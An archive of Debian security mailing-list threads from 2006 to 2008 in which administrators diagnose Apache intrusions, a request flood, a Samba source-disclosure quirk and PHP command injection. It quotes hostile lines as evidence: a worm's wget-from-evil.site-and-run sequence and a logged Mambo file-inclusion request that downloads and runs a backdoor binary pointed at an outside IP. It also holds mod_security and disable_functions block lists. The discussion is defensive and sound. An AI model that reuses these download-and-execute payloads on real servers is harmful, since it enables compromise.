> We get some strange Request from some Dial-Up Accounts from Europe
> (T-Online; Telefonica; Orange...):
>
>
>
> Sep 21 22:47:35 logger: [Sun Sep 21 22:47:35 2008] [error] [client
> 87.183.65.xx] Invalid URI in request GET 347905 HTTP/1.0 Sep 21 22:47:35
> logger: [Sun Sep 21 22:47:35 2008] [error] [client 87.183.65.xx] Invalid URI
> in request GET 341922 HTTP/1.0
>
>
>
> This strange Request (GET 347905 HTTP/1.0 ) pass our Firewall (because it´s
> normal HTTP), goes to our Load balancer and then to our Webserver.
>
>
>
> Only 1 Client make about 80-100 strange Request per Minute and we get a
> peak on our Webserverfarm and finally after 5 Minutes the Webserver(s) get
> out of memory:
>
>
>
> Out of Memory: Kill process 12082 (apache) score 199722 and children.
>
> Out of memory: Killed process 19435 (apache).
>
>
>
> If we get a "DDOS" we make a tcpdump and count the IPs (maximum 8 Dial Up
> Accounts) to block them on our Firewall.
>
>
>
> I don´t find any about this strange request on Google or some security
> boards.
>
>
>
> Is this a new kind of DDOS or just kiddy stuff? If someone have some more
> information about this strange Request/DDOS it would be very nice if he can
> send this to me.
>
>
>
> Kind Regards
>
>
>
> --
>
> Andre Braun, IT Manager
>
>
>
> Turtle Entertainment GmbH
>
>
>
>
>
>
>
>
>



-- 
Best Regards,
Stephen


Apache "DDOS" with random number request

2008-09-21 Thread NeMiX
Hi there,

 

since last week we´ve got a little problem with our Webserverfarm.

We get some strange Request from some Dial-Up Accounts from Europe
(T-Online; Telefonica; Orange...):

 

Sep 21 22:47:35 logger: [Sun Sep 21 22:47:35 2008] [error] [client
87.183.65.xx] Invalid URI in request GET 347905 HTTP/1.0 Sep 21 22:47:35
logger: [Sun Sep 21 22:47:35 2008] [error] [client 87.183.65.xx] Invalid URI
in request GET 341922 HTTP/1.0

 

This strange Request (GET 347905 HTTP/1.0 ) pass our Firewall (because it´s
normal HTTP), goes to our Load balancer and then to our Webserver.

 

Only 1 Client make about 80-100 strange Request per Minute and we get a peak
on our Webserverfarm and finally after 5 Minutes the Webserver(s) get out of
memory:

 

Out of Memory: Kill process 12082 (apache) score 199722 and children.

Out of memory: Killed process 19435 (apache).

 

If we get a "DDOS" we make a tcpdump and count the IPs (maximum 8 Dial Up
Accounts) to block them on our Firewall.

 

I don´t find any about this strange request on Google or some security
boards.

 

Is this a new kind of DDOS or just kiddy stuff? If someone have some more
information about this strange Request/DDOS it would be very nice if he can
send this to me.

 

Kind Regards

 

--

Andre Braun, IT Manager

 

Turtle Entertainment GmbH

 

 

 

 



Re: [SECURITY] [DSA 1167-1] New apache packages fix several vulnerabilities

2006-09-04 Thread Mikko Rapeli
On Mon, Sep 04, 2006 at 07:39:16PM +0200, Thorsten Schifferdecker wrote:
> you wrote there's a sec-update of apache, but on security.debian.org
>  no update apache debs where found.

Try again a few times. It's on some of the security.debian.org hosts,
and propably replicating to all of them.

-Mikko


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: [SECURITY] [DSA 1167-1] New apache packages fix several vulnerabilities

2006-09-04 Thread Thorsten Schifferdecker
Hi Steve,

you wrote there's a sec-update of apache, but on security.debian.org
 no update apache debs where found.

Regards,
Thorsten


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Apache + samba problem

2006-03-13 Thread Maciej Gasiorowski
Hello list.

I've found out interesting thing using apache and samba on my test server.
I'm not sure if it is a new issue but I couldn't find anything similar
on google.

I've configured apache to serve content from a mounted windows share.
Now the best begins. When I add a backslash ("\") mark at the end of url
like
http://localhost/winshare/index.php\
apache displays my PHP code instead of executing it.

Simple strace shows something like that:

stat64("/home/winshare/index.php\\", {st_mode=S_IFREG|0644, st_size=217,
...}) = 0
lstat64("/home", {st_mode=S_IFDIR|S_ISGID|0775, st_size=4096, ...}) = 0
lstat64("/home/winshare", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
open("/home/winshare/.htaccess", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No
such file or directory)
lstat64("/home/winshare/index.php\\", {st_mode=S_IFREG|0644,
st_size=217, ...}) = 0
open("/home/winshare/index.php\\", O_RDONLY|O_LARGEFILE) = 5
select(4, [3], NULL, NULL, {0, 0})  = 0 (Timeout)
write(3, "HTTP/1.1 304 Not Modified\r\nDate:"..., 237) = 237

I guess that lstat or samba itself is stripping "\\" from the file
during name lookup because it doesn't return 404 error. But the
resulting extension (.php\) doesn't match any AddType directive, so
apache is just displaying it in plain text.
I've checked and after adding
AddType application/x-httpd-php .php .php\ .php%5C
code is being executed.

I've tested in on two linux boxes but on single windows share so it
could be some configuration error.
I don't suppose there are a lot of production servers configured in
similar way but it could still be an security issue.

Sorry, if this is a faq.

Best regards
Maciej Gasiorowski



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: security issues with apache!

2006-03-12 Thread Steve Kemp
On Mon, Mar 13, 2006 at 09:02:13AM +0200, Enver ALTIN wrote:

> If you have to leave some writable folders for Apache user, say, /tmp, 
> moving /tmp to another partition/filesystem and mounting it with 
> "noexec" option would prevent most harm /any/ PHP script can cause.

  Not true.

  Several of the receent exploit worms do the equivilent of this:

cd /tmp
wget http://evil.site/perl/script.pl
perl /tmp/script.pl &

  Even if the /tmp partition is mounted noexec this will still work.
 (Although '/tmp/script.pl &' would fail.)

  Noexec can help in some situations, but blocking 'wget', 'perl'
 etc in requests via mod_security is a much more useful thing to
 do.

Steve
-- 
Debian GNU/Linux System Administration
http://www.debian-administration.org/


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: security issues with apache!

2006-03-12 Thread Enver ALTIN

Hi,

Florian Reitmeir wrote:
I had a similar encounter about 2 months ago. The intruder exploited a 
PHP script that was poorly written. If you check your http access logs, 
you will most likely find an entry about the PHP that is been exploited. 
Once you find the offending PHP script, you can either remove it or  
add  an  exit(0); on top of the script so that it does not accept any 
input. If you are a good PHP programmer, you could fix the script so 
that it validates whatever input its getting.


if PHP is the entry point, then take a look at

- libapache2-mod-suphp
- PHP SAFE-Mode
- PHP Basedir
- set 'allow_url_fopen = Off' in your php.ini

they help. Also make sure, that there is no
writeable directory for the apache user.


If you have to leave some writable folders for Apache user, say, /tmp, 
moving /tmp to another partition/filesystem and mounting it with 
"noexec" option would prevent most harm /any/ PHP script can cause.


A PHP script alone can do little, but along with an HTTP-uploaded ELF 
binary that gets executed in the security context of Apache web server 
is a lot more scary.


-HAND
--
Enver


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: security issues with apache!

2006-03-07 Thread Florian Reitmeir
> I had a similar encounter about 2 months ago. The intruder exploited a 
> PHP script that was poorly written. If you check your http access logs, 
> you will most likely find an entry about the PHP that is been exploited. 
> Once you find the offending PHP script, you can either remove it or  
> add  an  exit(0); on top of the script so that it does not accept any 
> input. If you are a good PHP programmer, you could fix the script so 
> that it validates whatever input its getting.

if PHP is the entry point, then take a look at

- libapache2-mod-suphp
- PHP SAFE-Mode
- PHP Basedir
- set 'allow_url_fopen = Off' in your php.ini

they help. Also make sure, that there is no
writeable directory for the apache user.

-- 
Florian Reitmeir


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: security issues with apache!

2006-03-07 Thread Jon Dowland
At 1141730613, Petter Senften wrote:
> Recently I've noticed that my Apache-installation gets
> violated and that an intruder somehow manages to put stuff
> in /tmp and /var/tmp.  Then it makes Apache execute these.

Do you have mod_cgi installed and activated? If you are not
using it, disable it.

If the trouble-maker is executing things via PHP scripts,
you can stop them by disabling the exec and related
functions in PHP. The following line in /etc/php.ini would
do it for example:

disable_functions = system, exec, shell_exec, passthru, popen, pcntl_exec, 
openlog 

Alternatively turning on "safe mode" does this, I believe.

-- 
Jon Dowland
http://alcopop.org/


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: security issues with apache!

2006-03-07 Thread Stephen Gran
This one time, at band camp, Josep Serrano said:
> Hello Petter
> 
> We still don't know for what do you use your apache. Most of the problems 
> come from
> poor PHP scripts. What scripts/services are you running in this server?

I strongly suggest this as the source of your problems.  In my
experience, php apps do not take the care to sanitize input before
executing it.  Look in your access logs for exec commands or wget
commands.  Figure out which script was attacked, and fix or disable it.

> > Hi
> >
> > I'm not completely new to Debian or Linux, but I wouldn't classify
> > myself as a battlescarred sysadmin just yet :)
> >
> > Anyways. My problem is security-related, and I hope that I'm posting to
> > the correct list as well as hoping that someone can help me out here.
> >
> > Recently I've noticed that my Apache-installation gets violated and that
> > an intruder somehow manages to put stuff in /tmp and /var/tmp. Then it
> > makes Apache execute these. Unfortunately these are some rather nasty
> > things, mostly portscanners and bruteforce-attacks. They are all easily
> > detected with netstat, and at least once a day I have to go in and kill
> > the processes spawned by www-data (the user that runs Apache) as well as
> > delete the offending files.
> >
> > Now, like I said - I'm not a pro, I'm trying to learn by doing.
> > Unfortunately how this happens is way over my experience, and now I
> > could really use some help in fixing this leak. I've narrowed it down to
> > Apache only, but I have no clue as to how to seal the leak. I'm running
> > a small server in my home using (mostly) Debian Sarge. This is a real
> > Frankenstein-machine as it was originally a Woody-box, but it's been
> > upgraded with bits from all over. It's been running pretty much
> > constantly for three years. Of course I apply security fixes when they
> > arrive, but I don't know if the source of these intrusions is Apache or
> > just that I have managed to fubar some setting somewhere, allowing an
> > attacker to make Apache execute code.
> >
> > Essentially the machine is Debian Sarge, with MySQL and PHP4. There are
> > other services running on it, but I've noticed that the
> > intrusions/code-executions only happen through Apache. MySQL only
> > listens on localhost and accepts no connections from the outside. Hence,
> > I hope that this is limited to Apache. Apache is 1.3.x, MySQL 4.0.24 and
> > PHP 4.3
> >
> > I deeply appreciate any help that can make me seal this leak! Thank you
> > all in advance!
> >
> > /petter senften
> >
> 
> 
> -- 
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> 
> 

-- 
 -
|   ,''`.Stephen Gran |
|  : :' :[EMAIL PROTECTED] |
|  `. `'Debian user, admin, and developer |
|`- http://www.debian.org |
 -


signature.asc
Description: Digital signature


Re: security issues with apache!

2006-03-07 Thread Brian Brazil
On Tue, Mar 07, 2006 at 12:37:42PM +0100, Ismail wrote:
> >>Recently I've noticed that my Apache-installation gets violated and that
> >>an intruder somehow manages to put stuff in /tmp and /var/tmp. Then it
> >>makes Apache execute these. Unfortunately these are some rather nasty
> >>things, mostly portscanners and bruteforce-attacks. They are all easily
> >>detected with netstat, and at least once a day I have to go in and kill
> >>the processes spawned by www-data (the user that runs Apache) as well as
> >>delete the offending files.
> >
> I had a similar encounter about 2 months ago. The intruder exploited a 
> PHP script that was poorly written. If you check your http access logs, 
> you will most likely find an entry about the PHP that is been exploited. 

Sounds familiar, I'd be suspecting php scripts or similar. The first
thing I can suggest is mod_security, this is essentially an application
level firewall for apache, and lets you block things like 'wget', even
if they're encoded as say wg%65t. It supports logging all requests for
audit pruposes.

As for figuring out what is at fault, one thing to look at is timestamps
of the payload, in particular ctime. Then compare against your apache
logs and you should be able to get a shortlist of 5-10 seconds worth of
requests. POSTs are problematic as their data isn't in the apache logs,
but in combination with mod_security you should be able to finger the
exact request.

Finally, a bit of a plug. I wrote a script to look for processes hanging
off apache that have been there for too long e.g. a bot. Code at:
http://www.netsoc.tcd.ie/~bbrazil/code/brmon/ (long_running_apache).

Brian

-- 
Website: http://www.netsoc.tcd.ie/~bbrazil


signature.asc
Description: Digital signature


Re: security issues with apache!

2006-03-07 Thread Josep Serrano
Please keep the posts in the debian-security list only!
I apologize. It happens because I did cross post in both lists in the first 
place.



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: security issues with apache!

2006-03-07 Thread Ismail



Hi

I'm not completely new to Debian or Linux, but I wouldn't classify
myself as a battlescarred sysadmin just yet :)

Anyways. My problem is security-related, and I hope that I'm posting to
the correct list as well as hoping that someone can help me out here.

Recently I've noticed that my Apache-installation gets violated and that
an intruder somehow manages to put stuff in /tmp and /var/tmp. Then it
makes Apache execute these. Unfortunately these are some rather nasty
things, mostly portscanners and bruteforce-attacks. They are all easily
detected with netstat, and at least once a day I have to go in and kill
the processes spawned by www-data (the user that runs Apache) as well as
delete the offending files.

Now, like I said - I'm not a pro, I'm trying to learn by doing.
Unfortunately how this happens is way over my experience, and now I
could really use some help in fixing this leak. I've narrowed it down to
Apache only, but I have no clue as to how to seal the leak. I'm running
a small server in my home using (mostly) Debian Sarge. This is a real
Frankenstein-machine as it was originally a Woody-box, but it's been
upgraded with bits from all over. It's been running pretty much
constantly for three years. Of course I apply security fixes when they
arrive, but I don't know if the source of these intrusions is Apache or
just that I have managed to fubar some setting somewhere, allowing an
attacker to make Apache execute code.

Essentially the machine is Debian Sarge, with MySQL and PHP4. There are
other services running on it, but I've noticed that the
intrusions/code-executions only happen through Apache. MySQL only
listens on localhost and accepts no connections from the outside. Hence,
I hope that this is limited to Apache. Apache is 1.3.x, MySQL 4.0.24 and
PHP 4.3

I deeply appreciate any help that can make me seal this leak! Thank you
all in advance!

/petter senften

   




 

I had a similar encounter about 2 months ago. The intruder exploited a 
PHP script that was poorly written. If you check your http access logs, 
you will most likely find an entry about the PHP that is been exploited. 
Once you find the offending PHP script, you can either remove it or  
add  an  exit(0); on top of the script so that it does not accept any 
input. If you are a good PHP programmer, you could fix the script so 
that it validates whatever input its getting.


Ismail


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: security issues with apache!

2006-03-07 Thread Josep Serrano
Hello Petter

The actual list for security issues is debian-security. The address of this 
list its
on the CC. We can now leave debian-user and switch our discussion into
debian-security.

This is quite hole! Can't believe there's such a big spot in Apache / Sarge and 
we
didn't heard of it. Can you please share more details with us?

Give us your current package versions of apache (using dpkg -s for example). If 
you
suspect the installation could be compromised run a test on the checksums.

Your access logs could contain precious information. Have a look at them and 
post to
the list any significant parts (removing any ip/host address you don't want to 
get
published).

We still don't know for what do you use your apache. Most of the problems come 
from
poor PHP scripts. What scripts/services are you running in this server?

Can you post a sample of your netstat, your list of process for user www-data, 
and a
sample of the files you find in your /tmp ?


Regards,
Josep SERRANO


> Hi
>
> I'm not completely new to Debian or Linux, but I wouldn't classify
> myself as a battlescarred sysadmin just yet :)
>
> Anyways. My problem is security-related, and I hope that I'm posting to
> the correct list as well as hoping that someone can help me out here.
>
> Recently I've noticed that my Apache-installation gets violated and that
> an intruder somehow manages to put stuff in /tmp and /var/tmp. Then it
> makes Apache execute these. Unfortunately these are some rather nasty
> things, mostly portscanners and bruteforce-attacks. They are all easily
> detected with netstat, and at least once a day I have to go in and kill
> the processes spawned by www-data (the user that runs Apache) as well as
> delete the offending files.
>
> Now, like I said - I'm not a pro, I'm trying to learn by doing.
> Unfortunately how this happens is way over my experience, and now I
> could really use some help in fixing this leak. I've narrowed it down to
> Apache only, but I have no clue as to how to seal the leak. I'm running
> a small server in my home using (mostly) Debian Sarge. This is a real
> Frankenstein-machine as it was originally a Woody-box, but it's been
> upgraded with bits from all over. It's been running pretty much
> constantly for three years. Of course I apply security fixes when they
> arrive, but I don't know if the source of these intrusions is Apache or
> just that I have managed to fubar some setting somewhere, allowing an
> attacker to make Apache execute code.
>
> Essentially the machine is Debian Sarge, with MySQL and PHP4. There are
> other services running on it, but I've noticed that the
> intrusions/code-executions only happen through Apache. MySQL only
> listens on localhost and accepts no connections from the outside. Hence,
> I hope that this is limited to Apache. Apache is 1.3.x, MySQL 4.0.24 and
> PHP 4.3
>
> I deeply appreciate any help that can make me seal this leak! Thank you
> all in advance!
>
> /petter senften
>


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



RE: Weird message in my apache error log

2006-02-01 Thread Josep Serrano
We have a match. See:

66.232.140.73 - - [31/Jan/2006:07:29:58 +0100] "GET http:///prxjdg.cgi?ja
HTTP/1.0" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

Where the http address maps to an apparently compromised server where these 
people
have installed some kind of proxy (proxy judge ?)


> I've seen this type of thing with PHP; I was going to say something but I
> figured I would wait since you didn't mention it.  Can you correlate the
> time/date/ip with the request from access.log?  It might give you more
> information.  I can say, that we get attacked regularly on Sarge and we're a
> relatively high volume site with the similar specs, and I've not seen
> anything like this as a standard hack - my experience is that this is most
> often caused by not filtering/validating forms, global PHP variables, or PHP
> scripting errors.  I am very curious to know what's going on.



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



RE: Weird message in my apache error log

2006-02-01 Thread David Johnson
I've seen this type of thing with PHP; I was going to say something but I
figured I would wait since you didn't mention it.  Can you correlate the
time/date/ip with the request from access.log?  It might give you more
information.  I can say, that we get attacked regularly on Sarge and we're a
relatively high volume site with the similar specs, and I've not seen
anything like this as a standard hack - my experience is that this is most
often caused by not filtering/validating forms, global PHP variables, or PHP
scripting errors.  I am very curious to know what's going on.




> -Original Message-
> From: Josep Serrano [mailto:[EMAIL PROTECTED]
> Sent: Wednesday, February 01, 2006 4:53 AM
> To: debian-security@lists.debian.org
> Subject: RE: Weird message in my apache error log
> 
> Hello guys,
> 
> No, I can't think of any specific application. Yes this web server is
> running a
> couple of php scripts but that's it.
> 
> Following your recommendations I have installed mod_security with the set
> of
> standard rules provided in www.modsecurity.org. I will be following up the
> audit log
> for any clues.
> 
> Be sure that I have strange files, permissions, or open ports in this box.
> I run
> daily checks and I got the vaccines :-)
> 
> Thanks,
> Josep SERRANO.
> 
> > What does your application do? It looks like it is finding a shell
> script
> > somewhere?  We've seen similar things when executing CGI's and not
> filtering
> > the input data so well.  The line 22, 24 make me think there is a script
> > somewhere rather than arbitrary GET data.
> >
> >> -Original Message-
> >> Looks like someone is trying to do arbritary commmand execution. You
> >> probably have a script somewhere that says `command $_GET['var']`, and
> >> someone is passing ';attack' as var, but it isn't quite working.
> >>
> >> I suggest using the audit log feature of mod_security, or just grepping
> >> through your access logs for anything odd ('wget' is a good search
> >> term).
> >>
> >> You might have a bot on the system, check for any odd network
> >> connections, especially to port 6667 (IRC). Also look for www-data
> owned
> >> files in /tmp.
> 
> 
> 
> --
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact
> [EMAIL PROTECTED]



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



RE: Weird message in my apache error log

2006-02-01 Thread Josep Serrano
Hello guys,

No, I can't think of any specific application. Yes this web server is running a
couple of php scripts but that's it.

Following your recommendations I have installed mod_security with the set of
standard rules provided in www.modsecurity.org. I will be following up the 
audit log
for any clues.

Be sure that I have strange files, permissions, or open ports in this box. I run
daily checks and I got the vaccines :-)

Thanks,
Josep SERRANO.

> What does your application do? It looks like it is finding a shell script
> somewhere?  We've seen similar things when executing CGI's and not filtering
> the input data so well.  The line 22, 24 make me think there is a script
> somewhere rather than arbitrary GET data.
>
>> -Original Message-
>> Looks like someone is trying to do arbritary commmand execution. You
>> probably have a script somewhere that says `command $_GET['var']`, and
>> someone is passing ';attack' as var, but it isn't quite working.
>>
>> I suggest using the audit log feature of mod_security, or just grepping
>> through your access logs for anything odd ('wget' is a good search
>> term).
>>
>> You might have a bot on the system, check for any odd network
>> connections, especially to port 6667 (IRC). Also look for www-data owned
>> files in /tmp.



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



RE: Weird message in my apache error log

2006-01-31 Thread David Johnson
What does your application do? It looks like it is finding a shell script
somewhere?  We've seen similar things when executing CGI's and not filtering
the input data so well.  The line 22, 24 make me think there is a script
somewhere rather than arbitrary GET data.

> -Original Message-
> From: Brian Brazil [mailto:[EMAIL PROTECTED]
> Sent: Tuesday, January 31, 2006 4:53 PM
> To: debian-security@lists.debian.org
> Subject: Re: Weird message in my apache error log
> 
> On Tue, Jan 31, 2006 at 11:19:45PM +0100, Josep Serrano wrote:
> > Hello all. I got some weird entries in my apache error log.
> > Any clues about what/where/how ?
> >
> > sh: -c: line 22: unexpected EOF while looking for matching ``'
> > sh: -c: line 24: syntax error: unexpected end of file
> >
> > sh: -c: line 0: unexpected EOF while looking for matching `"'
> > sh: -c: line 1: syntax error: unexpected end of file
> 
> Looks like someone is trying to do arbritary commmand execution. You
> probably have a script somewhere that says `command $_GET['var']`, and
> someone is passing ';attack' as var, but it isn't quite working.
> 
> I suggest using the audit log feature of mod_security, or just grepping
> through your access logs for anything odd ('wget' is a good search
> term).
> 
> You might have a bot on the system, check for any odd network
> connections, especially to port 6667 (IRC). Also look for www-data owned
> files in /tmp.
> 
> Brian
> 
> --
> Website: http://www.netsoc.tcd.ie/~bbrazil


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Weird message in my apache error log

2006-01-31 Thread Brian Brazil
On Tue, Jan 31, 2006 at 11:19:45PM +0100, Josep Serrano wrote:
> Hello all. I got some weird entries in my apache error log.
> Any clues about what/where/how ?
> 
> sh: -c: line 22: unexpected EOF while looking for matching ``'
> sh: -c: line 24: syntax error: unexpected end of file
> 
> sh: -c: line 0: unexpected EOF while looking for matching `"'
> sh: -c: line 1: syntax error: unexpected end of file

Looks like someone is trying to do arbritary commmand execution. You
probably have a script somewhere that says `command $_GET['var']`, and
someone is passing ';attack' as var, but it isn't quite working.

I suggest using the audit log feature of mod_security, or just grepping
through your access logs for anything odd ('wget' is a good search
term).

You might have a bot on the system, check for any odd network
connections, especially to port 6667 (IRC). Also look for www-data owned
files in /tmp.

Brian

-- 
Website: http://www.netsoc.tcd.ie/~bbrazil


signature.asc
Description: Digital signature


Weird message in my apache error log

2006-01-31 Thread Josep Serrano
Hello all. I got some weird entries in my apache error log.
Any clues about what/where/how ?

sh: -c: line 22: unexpected EOF while looking for matching ``'
sh: -c: line 24: syntax error: unexpected end of file

sh: -c: line 0: unexpected EOF while looking for matching `"'
sh: -c: line 1: syntax error: unexpected end of file

Thanks,
Josep SERRANO.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Strange Apache log and mambo security - sexy executable

2006-01-23 Thread Jose Marrero
Life is only probabilities...isn't it?

A quick link for an overview:

http://en.wikipedia.org/wiki/Referer_spam

There are blacklists elsewhere, some updated every 15 minutes.


On Mon, January 23, 2006 8:58 am, Christoph Ulrich Scholler said:
> Hi,
>
> On 23.01. 07:46, Jose Marrero wrote:
>> Apache configured with mod_rewrite to deny blank or fake referers is a
>> good idea.
>
> How can you tell that a referrer is fake?
>
> Regards,
>
> uLI
>
>
> --
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact
> [EMAIL PROTECTED]
>


-- 
-JM. “Estos días azules y este sol de la infancia “(Antonio Machado-1939)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Strange Apache log and mambo security - sexy executable

2006-01-23 Thread Christoph Ulrich Scholler
Hi,

On 23.01. 07:46, Jose Marrero wrote:
> Apache configured with mod_rewrite to deny blank or fake referers is a
> good idea.

How can you tell that a referrer is fake?

Regards,

uLI


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Strange Apache log and mambo security - sexy executable

2006-01-23 Thread Jose Marrero
Just a couple of things:

Apache configured with mod_rewrite to deny blank or fake referers is a
good idea.

Do you have apache configured with mod_security?  I highly recommend this
last one since you run an php based CMS and can protect from exploits not
yet discovered.


On Mon, January 23, 2006 2:32 am, Maik Holtkamp said:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> Edward Shornock schrieb:
>> > On Mon, Jan 23, 2006 at 08:31:40AM +0100, Maik Holtkamp wrote:
>> > Hi,
>> >
>> > yesterday morning I found a strange entry in my apache log files
>> (debian
>> > sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan
>> > Server, just serving my Family and some good friends (normally).
>> >
>> > ---cut---
>> > 132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET
>> > /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.20
>> > 3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20YYY;echo|
>> >  HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
>> 5.1;)"
>> > ---cut---
>> >
>> > As I patched mambo against recent "register global" attack and my /tmp
>> > is mount noexec, the attack doesn't exploit anything.
>> >
>> > However, I curiously downloaded this sexy executable to have a closer
>> look.
>> >
>> > ---cut---
>> > backup:/home/qmb# ./sexy -h
>> > ./sexy  
>> > ---cut---
>> >
>> Never run apps like this as root.  Bad bad idea.
>
> There is an old saying in Germany:
>
> "Only damage will make you wise"

Funny, Don Quixote (when in a good mood) used to say, "Sancho, why
experience always comes when is not needed?"*

*I am just paraphrasing...




-- 
-JM. “Estos días azules y este sol de la infancia “(Antonio Machado-1939)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Strange Apache log and mambo security - sexy executable

2006-01-23 Thread Maik Holtkamp
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Edward Shornock schrieb:
> > On Mon, Jan 23, 2006 at 08:31:40AM +0100, Maik Holtkamp wrote:
> > Hi,
> > 
> > yesterday morning I found a strange entry in my apache log files (debian
> > sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan
> > Server, just serving my Family and some good friends (normally).
> > 
> > ---cut---
> > 132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET
> > /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.20
> > 3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20YYY;echo|
> >  HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> > ---cut---
> > 
> > As I patched mambo against recent "register global" attack and my /tmp
> > is mount noexec, the attack doesn't exploit anything.
> > 
> > However, I curiously downloaded this sexy executable to have a closer look.
> > 
> > ---cut---
> > backup:/home/qmb# ./sexy -h
> > ./sexy  
> > ---cut---
> > 
> Never run apps like this as root.  Bad bad idea.

There is an old saying in Germany:

"Only damage will make you wise"

In spite the box where I tried was on the second line and I did not pass
any arguments (IP/port) to the tool, I see the chance that it would have
polluted the whole LAN and probably even find a way to the outside, now.

Thanks god it wasn't that evil, so the knoppix restore could fix the
situation.

> If you want more information about this tool, google for "Linux.RST.B"
> or "Unix/RST.B".

Thank you very much.

- --
- - maik
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFD1LDZz3bq6aadmI8RAj/fAJ93fsZEUSRiPNRGUqs7Q7t6pDOF8wCeK1Tn
LzAJkhxI+Kfs5njhvwZ/Xio=
=3tRt
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Strange Apache log and mambo security - sexy executable

2006-01-23 Thread Edward Shornock
Oops...didn't trim enough of the response and curiosity made me research
this.

According to the sophos site:

--cut--
Linux/Rst-B will attempt to infect all ELF executables in the current
working directory and the directory /bin

If Linux/Rst-B is executed by a privileged user then it may attempt to
create a backdoor on the system. This is achieved by opening a socket
and listening for a particular packet containing details about the
origin of the attacker and the command the attacker would like to
execute on the system.

--end--



I'd reinstall since you ran this executable on your system as root.  Who
knows what the full extent of the damaged caused is...


signature.asc
Description: Digital signature


Re: Strange Apache log and mambo security - sexy executable

2006-01-23 Thread Edward Shornock
On Mon, Jan 23, 2006 at 08:31:40AM +0100, Maik Holtkamp wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> Hi,
> 
> yesterday morning I found a strange entry in my apache log files (debian
> sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan
> Server, just serving my Family and some good friends (normally).
> 
> - ---cut---
> 132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET
> /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.20
> 3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20YYY;echo|
>  HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> - ---cut---
> 
